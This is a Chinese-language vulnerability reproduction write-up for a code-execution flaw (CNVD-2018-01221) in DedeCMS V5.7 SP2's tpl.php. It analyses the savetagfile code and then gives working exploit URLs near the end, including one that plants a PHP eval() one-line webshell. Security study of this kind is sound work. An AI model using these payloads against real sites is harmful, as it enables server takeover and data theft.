(CNVD-2018-01221)DedeCMS V5.7 SP2存在代码执行漏洞

一、漏洞简介

DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell

二、漏洞影响

三、复现过程

需要登录后台

根据公开的漏洞知道tpl.php里面251-281行存在代码执行漏洞,打开tpl.php文件

代码分析

(1)此处定义了一个savetagfile的函数,首先做一个判断,参数“action”是否等于savetagfile,如果等于,就进行下一步
(2)csrf_chack(),这里有一个csrf检验的函数,我们需要加上token来绕过,token是登陆的令牌,当我们向服务器发送登录请求时,在客户端会生成一个用于验证的令牌。
(3)正则表达式匹配,详情参见https://www.runoob.com/regexp/regexp-rule.html*
   [a-z0-9_-]{1,}的意思是,匹配所有包含一个以上的字母数字下划线和横杠,后面的\.意思是匹配小数点
   所以最终那个判断条件的意思是如果参数filename不符合上述的匹配条件,那么就不允许修改操作的进行,所以文件名必须要.lib.php结尾。
(4)preg_replace的意思是执行一个正则表达式的搜索和替换,我们可以通过例子来分析一下,发现得到的$tagname的值为moonsec
(5)stripslashes()的作用是引用用一个引用字符串,此处没有多大的作用
(6)最后是把$content里的内容写入到相对用的路径里,问题就出在了这里,这一部分代码除了对写入的文件名字做了简单的过滤,除了有一个csrf防护之外,其他并没有什么安全措施,     
   导致我们可以任意写入代码,如果我们直接写入一句话木马,那么就可以直接连上去拿webshell了

根据上面的代码知道要上传的参数有:action,token,filename,content.现在只剩下获取token了,要怎么才能获取到token呢?我们再去tpl.php里看一下,发现action的参数有很多,比如del,upoladok,edit,upload等等,但只有传入upload的时候页面才会回显正常,而其他的都会显示token异常,所以只能通过action=upload来获取token。

漏洞复现

获取token

http://0-sec.org/dede/tpl.php?action=upload

然后查看网页源代码,找到token

构造payload如下

http://0-sec.org/dede5.7/dede/tpl.php?filename=(文件名随意).lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=f1ccc319d5c897a3a362335792a21e05(替换你复制的token)

访问了成功写入

访问写入的文件

http://0-sec.org/include/taglib/(你上传的文件名).lib.php

也可以构造一句话木马payload

http://0-sec.org/dede5.7/dede/tpl.php?filename=caidao.lib.php&action=savetagfile&content=%3C?php%20@eval($_POST[%27dylan%27])?%3E&token=2d7ef87e9828edaad2d7b6bbe37f1929